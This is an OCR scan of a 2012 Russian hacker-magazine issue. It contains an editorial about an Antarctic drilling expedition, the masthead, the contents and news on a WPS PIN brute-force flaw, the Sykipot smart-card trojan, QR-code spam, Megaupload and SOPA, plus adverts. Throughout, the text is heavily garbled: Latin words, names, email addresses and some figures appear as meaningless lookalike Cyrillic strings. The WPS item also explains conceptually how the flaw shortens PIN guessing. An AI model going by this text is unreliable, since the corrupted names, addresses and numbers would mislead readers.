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ПРИВЕТ 
С АНТАРКТИДЫ 

Две недели назад получил особенное электронное письмо, которое 
меня по-хорошему тронул о и заставило задуматься о вечном. Писал 
Серега Сильное — редактор рубрики «Фрикинг», который еще 
в прошлом годуотправился в научнуюэкспедицию в Антактиду. 
Письмо стало особенным, потому что отправлено почти с южного 
полюса и передано по коротковолновой связи со скоростью ~50 
бод через некоммерческую радиолюбительскую сетьѴѴІМЫМК. 

В письме Сергей передавал приветы и рассказывал о своих впе- 
чатлениях, которые втаком необычном месте рождаются отсамых 
простых вещей. 

Впрочем, всяэта романтика была лишьсопутствующей вещьюдля 
Сергея, ведьон приехалтуда всоставеэкспедиции, которая должна 
была пробуритьЗ 768 метров льда и ответственно дотянуться 
до подледного озера Восток, не навредив ему. Озеро действитель- 
но огромное: 250 километров в длину, 50 — в ширину, и до 1.2 — в 
глубину. Учитывая, что оно было изолировано от внешнего мира 
сотни тысяч лет, вопросы об обитающих в этом озере фор мах жизни 
и отом, что вообщетам происходит, — чертовски интересны: до- 
стоверно об этом человечеству ничего не известно. Не та куж много 
осталосьна планете неизученныхуголков, — и вотозеро Восток 
является одним из таких объектов. 

Какова же была моя радость, когда сегодня (5 февраля) я прочел но- 
востьотом, что российская экспедиция достиглауспеха и добурила 
эту скважину, реализовав проект, длившийся болееЗОлет! Чертов- 
ски гордза Сергея и его коллег — российскихученых, работающих 
вэтойэкспедиции и решившихтакую сложнуюзадачу! Выполняю 
его просьбу: передаю приветвсем читателямХс Антарктиды :). 

Р.5. Сергей обещал сделать фотографию с вытоптанным в снегу 
на фоне полярной станции логотипом Хакера. Ждем его возвра- 
щения :). 




РЕДАКЦИЯ 

Главный редактор 
Шеф-редактор 
Выпускающий редактор 



Никита «пікіІ 022 »Кислицин [ пікііогйгеаі.хакер.гиі 
Степан «5Іер» Ильин [ зіерйгеаі.хакер.гиі 
Николай «догі» Андреев [ догІитОгеаІ.хакер.гиІ 



Редакторы рубрик 

РС_20МЕииН1Т5 

ВЗЛОМ 

иМ1Х0Юи5УЫ/АСК 

МАІѴѴАРЕ 

кодинг 

РР-директор 
Литературный редактор 

оѵо 

Выпускающий редактор 
ипіх-раздел 
Бесигііу-раздел 
Монтаж видео 

АКТ 

Арт-директор 
Дизайнер 
Верстальщик 
Иллюстрация на обложке 



Степан «5Іер» Ильин [ зіерйгеаі.хакер.гиі 
Магі таддйгеаі.хакер.ги ) 

Андрей «АпсІгизЬоск» Матвеев [ апсігизЬоскгагеаІ.хакер.гиІ 
Александр «Ог. КІоипіг» Лозовский [ аіехапсіегйгеаі.хакер.ги і 
Николай «догІ» Андреев ( догіиппйгеаі.хакер.гиі 
Анна г ригорьева [ дгідогіеѵайдіс.гиі 
Елена Болотникова 



Антон «ап1»Жуков (апійгеаі.хакер.ги і 
Андрей «АпсІгизЬоск» Матвеев [ апсІгизЬоскйгеаІ.хакер.ги ] 
Дмитрий «01 д1» Евдокимов [еѵсіокітоѵсізйдтаіі.соті 
МаксимТрубицын 



АликВайнер ІаІікОдІс.ги) 
Егор Пономарев 
Вера Светлых 
Александр Бричкин 



ривизніыб 

Учредитель ООО «Г ейм Лэнд», 1 1 5280, Москва, 

ул. Ленинская Слобода,1 9, Омега плаза, 5 этаж, офис № 21 . Тел.: (495) 935-7034, факс: (495) 545-0906 



Г енеральный директор 
Г енеральный издатель 
Финансовый директор 
Директор по маркетингу 
Управляющий арт-директор 
Главныйдизайнер 
Директор по производству 



Дмитрий Агарунов 
Андрей Михайлюк 
Андрей Фатеркин 
Елена Каркашадзе 
АликВайнер 
ЭндиТернбулл 
Сергей Кучерявый 



РАЗМЕЩЕНИЕ РЕКЛАМЫ 

Тел.: (4951 935-7034, факс: (495) 545-0906 



РЕКЛАМНЫЙ ОТДЕЛ 

Директор группы ТЕСНМ0106Ѵ 
Старшие менеджеры 

Менеджер 

Директор корпоративной группы 

Старший менеджер 
Менеджер 

Старший трафик-менеджер 



Марина Филатова ( ІІІаІоѵаОдІс.ги) 

Ольга Емельянцева ( оІдаетКадІс.ги І 
Оксана Алехина [ аІекЫпайдІс.гиІ 
Елена Поликарпова ( роіікагроѵайдіс.ги і 
(работа с рекламными агентствами) 
Кристина Татаренкова (іаіагепкоѵайдіс.ги ) 
Юлия Господинова (дозросііпоѵайдіс.гиі 
Мария Дубровская ( сІиЬгоѵзкауайдІс.гиІ 
Марья Буланова ( Ьиіапоѵайдіс.гиі 



ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ 

Директор Александр Коренфельд ( когепІеІсКЭдІс.гиІ 

Менеджеры Светлана Мюллер 

Наталия Тулинова 



РАСПРОСТРАНЕНИЕ 

Директор по дистрибуции 
Руководитель отдела подписки 
Руководитель 
спецраспространения 



Кошелева Татьяна ( козЬеІеѵайдІс.ги) 
Клепикова Виктория ( Іерікоѵайдіс.ги) 

Лукичева Наталья (ІикісЬеѵаОдІс.ги І 



Претензии и дополнительная инфа: 

В случае возникновения вопросов по качеству печати и РѴР-дисков: сіаітйдіс.ги . 

Горячаялиния по подписке 

Факсдля отправки купонов и квитанций на новые подписки: (495) 545-09-06 
Т елефон отдела подписки для жителей Москвы: (495) 663-82-77 
Т елефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999 
Для писем: 101000, Москва, Главпочтамт, а/я 652, Хакер 



Зарегистрировано в Министерстве Российской Федерации по делам печати, телерадиовещанию 
и средствам массовых коммуникаций ПИЯ 77-11802 от 14.02.2002. 



Отпечатано в типографии ВсапѵѵеЬ, Финляндия. Тираж 21 9 833 экземпляров. 

Мнение редакции не обязательно совпадаете мнением авторов. Все материалы в номере 
предоставляются как информация к размышлению. Лица, использующие данную информацию 
в противозаконных целях, могут быть привлечены к ответственности. Редакция не несет ответ- 
ственности за содержание рекламных объявлений в номере.За перепечатку наших материалов без 
спроса — преследуем. 



пікНо22,гл.ред.Х 

зЬор.дІс.ги/хакер 
ѵкопіакіе.ги/хакер ппад 



По вопросам лицензирования и получения прав на использование редакционных материалов 
журнала обращайтесь по адресу: сопіепійдіс.ги . 

© ООО «Г ейм Лэнд», РФ, 201 2 



ХАКЕР 03/158/2012 



001 




Соп!еп! 

НЕАОЕК 



14 МИЛЛИМОВ АМЕРИКАНЦЕВ 
РЕГУЛЯРНО ПОЛЬЗУЮТСЯ 
ТЕХНОЛОГИЕЙ ОР-КОДОВ 



008 



004 


МЕСАNЕVV5 


016 




Все новое за последний месяц 




011 


Иаскегіѵѵееіз 


017 




Хак-сцена втвиттере 





Колонка Степы Ильинна 

Охранении паролей 

Ргоо^о^сопсері 

Задача: собрать интересные данные с Раз^еЬіп.сот 





Большая 
охота 

Интервью с ведущим хед- 
хантером рунета 



030 



С0ѴЕК5Т0КѴ 



С0ѴЕК5Т0КУ 



018 

Ломаем ѴѴі-Рі 
за 10 часов 

ПолучаемѴѴРА- 
ключ для ѴѴІ-РІ с 
помощью уязви- 
мойтехнологии 
ѴѴР5 



С0ѴЕК5Т0КУ 



024 

Расщепляй И 
властвуй 

Уязвимости рас- 
щепления запро- 
са и внедрения 
заголовков в со- 
временном вебе 








Н РС20ЫЕ 



иміхоіо 



038 в Китайза покупками? 

Семь китайских интернет-магазинов со всякой всячиной 

042 Проверка на прочность 

Тестируем универсальную распознавалку С АРТСН А 
048 Фреймворкдляпентестера 

Тестируем безопасность веб-приложения с помощью 
ѵѵЗа^ 



104 Свобода через изоляцию 

Из чего состоят безопасные Ыпих-дистрибутивы 
108 Федорино счастье 

Мини-обзор заслуживающих внимания изменений 
в последних версиях Ребога 
110 Достучаться до небес 

Интегрируем Ыпих и «облачные» сервисы 



ВЗЛОМ 



Н 5УМ/АСК 



052 Еазу-Наск 

Хакерские секреты простых вещей 

056 Обзор эксплоитов 

Анализ свеженьких уязвимостей 

062 РНР-ботдляѴѴіпсіоѵѵз 

Коди м бота для распределенных вычислений 

066 Ісапсгаскіі! 

Решение заданий для ха к-кон курса, учрежденного 
Управлением правительственной связи 
Великобритании 

070 Фальшивые5М5:похудейза30дней! 

Вся подноготная известного лохотрона 

074 Х-Тооіз 

Программы для взлома 

Н МАШАВЕ 

076 Веселая тройка буткитов 

Самыетехнологичныеугрозы 2011 года 
в веселых картинках 

082 Малварьдля мобильных«окошек» 

Исследуем модельбезопасности популярной ОС 
для смартфонов на практике 

н кодинг 

088 Формграббердля боодІеСЬготе 

Исследуем отправку зашифрованных форм 
и способ их перехвата в браузере отбоодіе 
094 И целого Си мало 

Расширяем возможности препроцессора С/С++ 
с помощью стороннего кодогенератора 
096 Задачи на собеседованиях 

Подборка интересныхзаданий, которые дают 
на собеседованиях 

100 Паттерны проектирования «Адаптер>^ и «Фасад» 

Меняем интерфейсы классов без ущерба для здоровья 



114 Впоискахинсайдера 

Борьба с утечка ми корпоративной информации 
120 Корпоративныесвязи 

Опенсорсные решения для централизованного 
управления доступом кресурсам 
124 Испытание нагрузкой 

Создаем высокопроизводительный сайт 
с использованием пдіпх и 0]апдо 

н РЕввим 

130 От«винта»! 

Тестирование внеш них жестких дисков с СІ5В3.0 

136 Е(ППегВ2500 

Обзор универсальной активной стереосистемы 2.0 
138 ѴѴЕХІЕК.ВООКТ7055 

И швец, и жнец, и на дуде игреце цветным 
сенсорным дисплеем 

н юниты 

140 РАОиЫІТЕО 

Большой РАО 

143 Диско 

8.5 Гб всякой всячины 

144 ѴѴѴѴѴѴ2 

Удобные ѵѵеЬ-сервисы 






МЕ6АМЕѴѴ5 




60061Е ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ 
ПАТЕНТОВ. Истцом выступаетВгіІізИ 
Теіесот— одна из крупнейших в мире 
телекоммуникационных компаний. 



НОВАЯ ДЫРКА В ѴѴР5 
ОБЛЕГЧАЕТ ЗАДАЧУ ХАКЕРАМ 

БРУТФОРСИМ ЛЕГКО И БЫСТРО 



ТРОЯН ОХОТИТСЯ 
НА СМАРТ-КАРТЫ 
ВОЕННЫХ 




ѴѴІ-П РЯОТЕСТЕО 

ЗЕТУР 






Отметим, что ни один 
из производителей, 
продукты которых 
подверженыуязви- 
мости, не выпустил 
ееисправление. 

В своей статье Вибок 
пишет, что лучшим 
способом борьбы 
сдыркой на данный 
моментявляется 
отключениеѴѴРЗ. 



еприятную уязвимость на- 
шел В стандарте ѴѴР5 (ѴѴі-Рі 
Ргоіесіесі 5е1ир) исследо- 
ватель в области информационной 
безопасности Стефан Вибок, очем 
и поспешил уведомитьС15-СЕРТ 
Дырка присутствуете продуктах мно- 
гих популярных брендов, в том числе 
0-Ыпк, Меідеаг, Ыпкзуз и ВиЛаІо. Она 
позволяет ощутимо сократить время, 
уходящее на брутфорс РІМ-кода, 
который необходим дляустановки 
беспроводного роутера. В результате 
ошибки катакующему возвращается 
слишком много информации о РІМ- 
коде, а сам он становится слабее, 
что негативно влияет на защиту 
тысяч, если не миллионов ѴѴі-Рі- 
маршрутизаторов иточекдоступа. 

В 115-СЕРТ поясняют:«Если проверка 
подлинности РІМ-кодазавершилась 
неудачно, точка доступа посылает 
сообщение ЕАР-МАСКназад клиенту. 
Эти сообщения пересылаютсятаким 
образом, чтохакеруудается опреде- 
лить, является ли первая половина 
РІМ-кода верной. Последняя цифра 
уже известна, так как она являет- 
ся контрольной суммой РІМ-кода. 

Все это значительно сокращает 
количество попыток, требуемых для 
успешного брутфорса: оно снижается 
с Ю'^бдо 10'^3 + 10'^4, тоестьдо 11 ты- 
сяч». Подробнееобэтомты можешь 
прочитатьводной из статей рубрики 
СоѵегВіогуэтого номера. 




МАЛ ВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ-АТАК, 
СМЕНИЛАПРОФИЛЬ 




троянцеВукіроІ, казалосьбы, нетничего особен- 
ного — малварь, ориентированная на похищение 
данных о смарт-картах, не нова. Ноне каждый 
день увидишь малварь, цель которой — смарт-карты 
сотрудников Министерства обороны СШАи получение 
с их помощью несанкционированногодоступа к огра- 
ниченным ресурсам. Именно такие модификации в коде 
Вукіроі обнаружили специалисты компании АІіепѴаиІЕ 
Одна из новых функций троянца обеспечиваетвзаимо- 
действиес ПО АсІіѵІбепІіІуАсІіѵСІіепІ, которое как раз 
работает со смарт-картами, соответствующими стандар- 
там безопасности Минобороны США. В американском 
Миноборонытакие карточки используются для хранения 
цифровыхсертификатов работников и их РІМ-кодов, при- 
меняемыхдля аутентификации. В результате технического 
анализа специалистам АІіепѴаиК удал ось выяснить, что 
новый вариант кода скомпилирован еще в марте 2011 года, 
но он до сих пор был не слишком широко распространен. 

Он способен перехватыватьданныеосертификатахи при 
помощи встроенного кейлоггера снимать данные о вво- 
димых РІМ -кодах. После перехвата Вукіроі переправляет 
краденую информацию на защищенные ресурсы в Китае. 
Это, впрочем, не говорит о том, что получатели данных 
тоже находятся в КНР. 






іяііам4 КйлР йр іИв ? 1<Ц ™ ^ 
ІАІ.- 




КОМПАНИЯ «СКАРТЕЛ>^ 
(БРЕНД УОТА) ЗАПУСТИЛА 
В НОВОСИБИРСКЕ первую 
сеть ІТЕ в России. Сейчас 
сеть включаетбЗ базовые 
станции, но к марту ихуже 
станет 150. 



ПОРТЫ СТАНДАРТА ОЗВ 3.0 
СКОРО, наконец, появятся 
на смартфонах и планше- 
тах. По информации с СЕ5, 
произойдетэто в конце 2012- 
го или в начале 2013 года. 



ПРОИЗВОДИТЕЛЬЫНиХ- 

ДИСТРИБУТИВАМАНОЯІѴА, 

контролируемый российским 
фондом N61, скоро может 
объявить о банкротстве. 

Увы, дела у компании совсем 
плохи. 



Ѵ\^ІНОО№РНОНЕ 
МАЯКЕТРІАСЕ перешагнул 
отметку в БОтысяч при- 
ложений. На это магазину 
понадобилось 14 месяцев 
(АпсігоісІ Магкеі в свое время 
потребовалось 19). 



КОМАНДАІРНОНЕВЕѴ-ТЕАМ, 

наконец-то, выпустила 
джейлбрейкподіОЗБ.ОІ для 
іРИопе45 и іРасІ 2.3а первые 
три дня утилиту скачало 
более одного миллиона 
человек. 
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Реклама. Товар произведен в соответствии с Техническим Регламентом на табачную продукцию. 
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ИЗГОТОВЛЕНО ПОД КОНТРОЛЕМ РЕЕМТСМА СИГАРЕТТЕНФАБРИКЕН ГМБХ, МАКС-БОРН-ШТРАССЕ 4, 22761 ГАМБУРГ, ГЕРМАНИЯ 




МЕ6АМЕѴѴ5 



23% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ МАМО скупила в четвертом квартале прошлого года Арріе. 



ПЛАНШЕТ, ПРИСТАВКА ИЛИ 
ЧТО-ТО ДРУГОЕ? 



РАССМОТРЕНИЕ 50РА 
И РІРА ОТЛОЖЕНО 



СМЕЛЫЙ КОНЦЕПТОТПА2ЕП 





Предварительно 
озвучены следую- 
щиетехническиеха- 
рактеристики: экран 
размером 10,1 дюйма 
и разрешением 1280х 
ЗООпикселей, много- 
канальная звуковая 
подсистема ОоІЬу 
7.1 (проектируемая 
вместе сТНХ), сред- 
ства беспровод- 
ногоподключения 
ѴѴі-Рі 802.1 1Ь/д/п 
иВІиеІооІЬЗ.О. 
Планируетсятакже 
использовать аксе- 
лерометры и сенсор- 
ный экран. 



□ мери канская компания Рагег хорошо известна во всем мире (в том чис- 
ле и в России) как производитель периферийных игровых устройств 
и принадлежностей. И нужно заметить, хороших — пока я пишу эту но- 
вость, моя рука как раз лежит на мышке от Рагег. Тем интереснее и неожиданнее 
былоувидеть Рго)ес1 Ріопа — проект, над которым в компании работаютсейчас 
и который был представлен на выставке СЕ5 2012. Эта концепция представляет 
собой игровой планшет, ориентированный на игры, наиболее популярные сей- 
час на ПК, то есть на игры «прожорливые» и мощные. Устройство планируется 
оснастить «интуитивными элементами управления» (кнопками и аналоговыми 
джойстиками) с силовой обратной связью. Где именно и как они будут располо- 
жены, хорошо видно на иллюстрации. А главное, основой Рго)ес1 Ріопа должен 
стать процессор Іпіеі Соге І7 третьего поколения. Заявлено, что поэтому вопро- 
су компаниятесносотрудничаетс Іпіеі. Этот ход должен устранить проблему 
с нехваткой игр для планшета — идея заключается в том, что практически все 
существующие игры смогут работать на устройстве без какой-либо переделки 
или доработки. Ты скажешь, что это только концепт, и будешь не прав. Специа- 
листы Рагегпочти готовы показатьработающиеобразцы. Предполагается, что 
поставки устройства начнутся уже в четвертом квартале текущего года. Стоить 
планшет должен неболее$1000. 



ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США. 



2АРР05.С0М УВЕДОМИЛ 24 МЛН 
КЛИЕНТОВ ОТОМ, ЧТО БД МА- 
ГАЗИНА ВЗЛОМАНА И ИНФОР- 
МАЦИЯ О НИХ МОГЛА ПОПАСТЬ 
В РУКИ ХАКЕРОВ 



О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ 
РЕЗУЛЬТАТАХ 

ы уже рассказывали о «чудесных» американских 
законопроектах50РА(5іор Опііпе РігасуАсі) и РІРА 
(РРОТЕСТІпІеІІесШаІ РгорегІуАсі), породивших 
волну негодования нетолько на Западе, но по всему миру. Для 
тех, ктоумудрился все пропустить, напоминаем:законопро- 
екты обязывают всех участников сети интернет (провайдеры, 
хостинги, поисковыесистемы и пр.) попервомутребованию 
правообладателя (без решения суда)удалятьпиратский 
контенти прекращатьлюбые взаимоотношения спират- 
скими сервисами. Платежныесистемы обязаны отключить 
возможность перевода денег, поисковики — удалить ссылки 
на сайты и т. д. В случае невыполнения этих требований ты 
считаешься соучастником и твой сайт могуттакже закрыть 
без суда и следствия. Кстати, иностранные сайты, сервера 
которых расположены в США, будут нести та кую же ответ- 
ственностьза нелегальный контент, какесли бы они были 
учреждены в Штатах. Более подробно с законопроектами 
и ихвозможными последствиями можно ознакомиться хотя 
бы в Википедии, а нас сейчас больше интересуют послед- 
ствия. Поняв, что«СОПАблизка», крупныеамериканские 
корпорации ощутилиугрозу для себя любимых. За драко- 
новские меры выступили, кпримеру, МРАА, РІААи альянс 
В5А(членами которогоявляются МісгозоН, Арріе, АбоЬе, 

Іпіеі ит.д.).Затопротиввысказались6оодІе,Тѵѵіиег, Мо 2 ІІІа, 
РасеЬоок,УаЬоо,еВау и другие представители интернет- 
индустрии. Чем ближе становился «деньХ», на который было 
запланировано рассмотрение законопроектов в Конгрессе, 
тем больше накалялись страсти. Восемнадцатого января 
в интернете прошла, пожалуй, самая массовая онлайновая 
акция протеста за все время его существования. Англоя- 
зычная Википедия провеласамый масштабный вистории 
опрос, подавляющеебольшинствоучастников которого 
поддержало отключение англоязычного раздела на сутки 
в знак протеста. Ребсііі приостановил работу, боодіе прикрыл 
свой логотип черным прямоугольником цензуры. Поддержа- 
ли протести в ѴѴогсІРгезз. В целом какции протеста Ыаскоиі 
примкнул и тысячи сайтов по всему миру. Несладко пришлось 
и сторонникам 50РА. Так, крупнейший в мире регистратор 
боОасІсІу, поддерживавший 50РА, подвергсяжесткомубой- 
котусостороны интернет-сообщества: пользователи приня- 
лисьтысячамиуводитьсвои домены отбоОасІсІу. Регистратор 
оценил ситуацию и поспешил отказаться отсвоихслов, 
нопозжевинтервьюТесЬСгипсЬ выяснилось, что боОасІсІу 
по-прежнему поддерживаетБОРА... В общем, оттокдоменов 
продолжается и сейчас. 

Сдался под давлением народного негодования и альянс 
В5А,заявивший,что50РА«требует доработки». Потом, 
уловивтенденцию, «передумали» и сенаторы, ратовавшие 
за анти пиратские за конопроекты. Восемь американских 
законодателей отказалисьподдерживатьБОРАпосле 18 
января и ЫаскоиСа, некоторые и вовсе встали на сторону 
протестующих. И что в итоге? Конгрессмен Ламар Смит, из- 
начально представивший законопроектБОРА, отозвал его, 
признав, что в нынешнем виде закон не может быть принят. 
Рассмотрениезаконопроектабылоотложено. РІРАпо- 
стиглатажеучасть. Можноли назватьэтопобедой?Врядли. 
Лоббисты и копирасты рассержены, ноостанавливаться они 
несобираются, полагая, чтосенаторов«затерроризировала 
блогосфера».Теперьлоббисты намерены немногопересмо- 
треть подход к проблеме. Звучитзловеще. 
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7ФИШЕК 

ВУРРАШ СШиВЗТАТІОМ 




Собственный 
облачный сервер 



Виі'і'аіо СІоисІЗіаІіоп — это не просто 
традиционный МА5. Хранилище позволяет 
легко организовывать удаленный доступ к 
данным через интернет практически с любых 
устройств: как со стационарного компьютера, 
так и с мобильных девайсов. 



Традиционно для решений ВиІ'І'аІо 
бэкап данных с клиентских машин 
орагнизовывается очень просто. При 
этом поддерживается как ѴѴіпсІоѵѵз, 
так и МАС 05. Устройство воль- 
ностью совместимо с эппловской 
технологией Тіте МасЫпе. 



Производительная 

конфигурация 



Несмотря на компактные размеры 
(150x175x45 мм), сетевое хранилище 
оснащено довольно производитель- 
ным железом, которое позволяет не 
только организовать быстрый сете- 
вой доступ к файлам, но и реализо- 
вать другие полезные функции. 



Встроенный 

ВіІТоггепІ-клиент 



Как и большинство со- 
временных МАЗов, ВиІ'І'аІо 
СІоисІЗіаІіоп оснащен встро- 
енным ВііТоггепІ-клиентом с 
удобным ѵѵеЬ-интерфейсом. 
Эту функцию по достоинству 
оценят любители интенсивно- 
го р2р-обмена: качать торрен- 
ты станет в разы удобней. 



Приложения для 
І05 и АпсІгоісІ 



Приложение ѴѴеЬассезз соз- 
дано для удаленного доступа 
с мобильных устройств к дан- 
ным, хранящимся на решениях 
фирмы ВиІ'І'аІо. Одновременно 
поддерживается несколько 
хранилищ, а само приложение 
умеет работать с файлами всех 
популярных форматов: от ви- 
део, фотографий и музыки до 
разноформатных документов. 



Перекодировка 

медиафайлов 



Большой объем 
и энергоэффективность 



Удобный бэкап 



Виі'і'аіо СІоисІЗіаІіоп умеет авто- 
матически кодировать весь виде- 
оконтент в нужном размере при 
удаленном доступе с мобильных 
устройств. Таким образом, можно 
удобно смотреть, например, 
видео на айфоне, не задумываясь 
о перекодировке файлов. 



Устройство позволяет разместить 
в себе один диск 5АТА-ІІ объемом 
от 1 до 2 Тб. Среднее энерго- 
потребление при этом не будет 
превышать 26 Вт. При текущих 
расценках на электроэнергию, в 
год это позволяет экономить до 4 
тысяч рублей, если сравнивать с 
обычным ПК. 
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МЕ6АМЕѴѴ5 



ИНДОНЕЗИЙСКИЙ ХАКЕР НМЕ17дефейснул сразу шесть доменов верхнего уровня, принадлежащих компании Зіетепз. 



ОР-КОДЫ МОГУТ БЫТЬ ОПАСНЫ 



МЕ6А0РША0ВСЕ 



КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ 




рактически все интересныетехнологические 
новинки рано или поздно оказываются «на служ- 
бе» у криминала. Не избежали этой участи и ОР- 
коды, популярность которых растет вместе с увеличением 
продажсмартфонов, планшетов и другихмобильных 
девайсов. 

Специалисты ѴѴеЬзепзеТЬгеаіЗеекегМеІѵѵогк об- 
наружили спам-сообщения, ссылающиеся на страницы 
со встроенными ОР- кодам и. По всей видимости, так спа- 
меры обходятспам-фильтры и пытаются заставить поль- 
зователей открывать ссылки именно с помощью мобиль- 
ныхустройств. Спам выглядит кактрадиционная реклама 
фармы и содержитссылку на сайт2і:ао.пІ — вполне легаль- 
ный сервис, позволяющий создавать ОР-коды для СІРІ- 
адресов. Как только пользователь переходит по ссылке, 
на экране отображается ОР-код, а справа от него — адрес. 
Когда пользовательсчитываетОР-код, его устройство 
либо автоматически переходитпозашифрованному адре- 
су, либо спрашивает у юзера разрешение (в зависимости 
от версии ОР-читалки). Эту особенность легко можно ис- 
пользовать для распространения специфичной мал вари 
черезуязвимости в мобильныхбраузерах: ведь обычно 
эти коды сканируютименноспомощью смартфонов. Увы, 
этот «виток эволюции» в атаках на мобильные девайсы 
предсказывали многиеаналитики. 





V 

□ 

Поданнымкомпа- 
ниисотЗсоге, 14 
млнамериканцев 
в возрасте от 18 
до34летрегулярно 
используют 
свои мобильные 
устройства для 
чтения ОР-кодов. 
Аведьеще недавно 
ОР-коды были по- 
пулярны в основном 
на Востоке. 



ФБРЗАКРЫЛО ОДИН ИЗ КРУПНЕЙШИХ 
ФАЙЛООБМЕННИКОВ 




пасный прецедентсоздан в США — ФБРзакрыло 
один из крупнейшихфайлообменников в сети 
Медаиріоаб, генерировавший, по его собствен- 
ным данным, около4% всего интернет-трафика. Похоже 
на за головок «желтой» новости, но, увы, это реальность. 
По за просу а мери канских спецслужб в Новой Зеландии 
также были арестованы основатель проекта Ким Оокопті 
Шмитц и еще три человека. Каждому из них грозиттюрем- 
ное заключение потрем обвинениям: 20 лет за мошенни- 
чество, 20 лет за отмывание денег и по пять лет за каждый 
случай нарушения копирайта! Помимоэтого, выдвинуты 
обвинения против трех граждан других стран. Эти люди 
имели отношение к проектам компании. По мнению 
Департамента юстиции США, Медаиріоаб способствовал 
распространению пиратского контента. За пять лет рабо- 
ты он якобы нанес индустрии развлечений ущерб в раз- 
мере $500 млн в виде недополученной прибыли. Кроме 
того, файлообменникпородил «криминальные денежные 
потоки» (отрекламы и продажи премиум-аккаунтов) 
на сумму $175 млн. 

Уже последовала реакция других ресурсов с аналогич- 
ным функционалом: кпримеру, известный хостинг-сервис 
РіІеЭопіс объявил о полном отключении файлообменного 
функционала (составляющего, заметим, его суть): теперь 
скачивать контент, загруженный другими пользователя- 
ми, невозможно. 

Отреагировала и «сетевая оппозиция» — Апопуітіоиз 
атаковали сайты ФБР, Минюста США, Белого дома, РІАА, 
МРААи ресурсы прочихорганизаций, из-за действий 
которых был закрыт файлообменный сервис. 





тнимоЕРВОіт. 

ИНТЕРФЕЙСТНиНОЕКВОІТСКОРОДОБЕРЕТСЯДОПК 
НАБАЗЕ ѴѴІН00ѴѴ5. Эту радостную весть сообщает нам 
издание ОідіТіте. По информации источника (данные о ко- 
тором не раскрываются), ряд «железных» гигантов, таких 
как5опу,А5и5,6ідаЬуІеТесІіпоІодуиА5Роск,ужеактивно 
внедряетТИипсІегЬоІІ в свои продукты. Новоежелезо 
должно добраться до рынка вапрелетекущего года. 




РЯДНЕБОЛЬШИХКОММЕРЧЕ- 
СКИХІРѴ6-СЕТЕЙ планиру- 
ется развернуть в Китае 
к концу 2013 года. Луже 
в 2015 году ІРѵб должен стать 
в Поднебесной стандартным 
протоколом. 




АМОЯОІОІМѴАЗІОМСОССЫЛКОЙ 

НАПР0ГРАММИСТАБ0061ЕС0- 

ОБЩАЕТ, что боодіе в скором 

будущем может начать вы- 

пускмобильныхпроцессоров 

подсобственнымтоварным 

знаком. 
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итоги 

КОНКУРСА 



□поир 




НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ 
СОВМЕСТНО С КОМПАНИЕЙ СВООР-ІВ, СПЕЦИАЛИЗИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ 
ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. 





Напомним, в рамках соревнования было необходимо провести расследование сразу двух ІТ-инцидентов: 
утечки конфиденциальных данных на предприятии, а также взлома сервера на базе Ііпих. 
Победителями конкурса являются (в алфавитном порядке): 



к сожалению, обещанный приз (трудоустройство в 
6гоир-1В) не подошел ни одному из победителей: 
Константин учится в Киеве и пока не может переехать 
в Москву, а Леонида полностью устраивает и текущее 
место работы. Тем не менее, чтобы все было честно, мы 
награждаем победителей ценными призами: каждый 
получает по іРасІ 2 ѴѴі-Рі 36 16 6Ь. 



Отчеты победителей 
опубликованы на нашем сайте: 
ѵѵѵѵѵѵ.хакер-ги/ро5І/58241/ 

Будь с нами! 

Стань одним из нас! 



Род занятий; р-„ 

«мостоятельнпгп Дало мне еюр о орг 



і=іі=;== 

квалификации организаторов». 



КОНСТАНТИН ИЛЬИН 



-я. гтѵпрнт 5 курса Физико-технического 

заняти . ^ нТУУ "Киевский политех- 

нический институт , Киев. 



МЕ6АМЕѴѴ5 



РАСЕВООК ВЫПУСТИЛ СОБСТВЕННЫЙ МЕССЕДЖЕР ДЛЯ Ѵ\^іпсІоѵѵ5, а ВКонтакте тем временем тестирует сервис видеозвонков 



ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХ ДЮЙМОВ 



НОВИНКАОТЗАМЗиЫСНАРІЗ-МАТРИЦЕ 

а прошедшей недавно в Лас-Вегасе выставке 
СЕ5 2012 свои последние разработки продемон - 
стрировалитоповые производители «железа» 
со всего мира. Интересного на СЕ5 было много, но пере- 
числить все мы, к сожалению, не имеем возможности, так 
что придется ограничиться малым. Одной из самых ярких 
новинок, представленныхна выставке, стал монитор 
527В970 от компании Ваппзипд, продолжающий 9-ю 
премиум -серию. Этот 27-дюймовый агрегат интересен 
тем, что он работает на основе технологии Р15 (РІапе Ыпе 
ЗѵѵікЫпд). По сути, это аналог ІР5 (Іп-РІапе ВѵѵікЫпд) 
отВаппзипд.ТаккакІРВ-матрицы на данный момент 
являются «вершиной пищевой цепи», эта старая-новая 
технологиязаинтересовала многих. 

Первый блинуВаппзипд, однако, вышел комом: два мо- 
нитора на Р15-матрице, представленные в прошлом году, 
обладали букетом всех возможных дефектов сборки, были 
помещены в корпус из довольно дешевого пластика и в 
результате имели засветы, битые пиксели ит. п. Похоже, 
теперьВаппзипд решила исправитьэтотпромах. 

Модель 527В970 выполнена в солидном и одновре- 
менносверхтонком корпусе, а всеэлементыуправления 
помещены в эргономичную алюминиевую подставку (там 
же находятся порты ввода-вывода и 115В-концентратор), 
регулируемую по высоте. Диапазон регулирования 
монитора 9-й серии по высоте составляет 10 см, плюс его 
можно наклонять. Панель имеет ультравысокую четкость 
ОНО (2560x1440), поддерживаеттехнологии ОізрІауРогІ, 
ОиаІ Ыпк-ОѴІ и Н ОМ I, а также оснащена стереодинамика- 
ми мощностью 7 Вт и интерфейсом МоЬіІе НідЬ ОеЯпіІіоп 
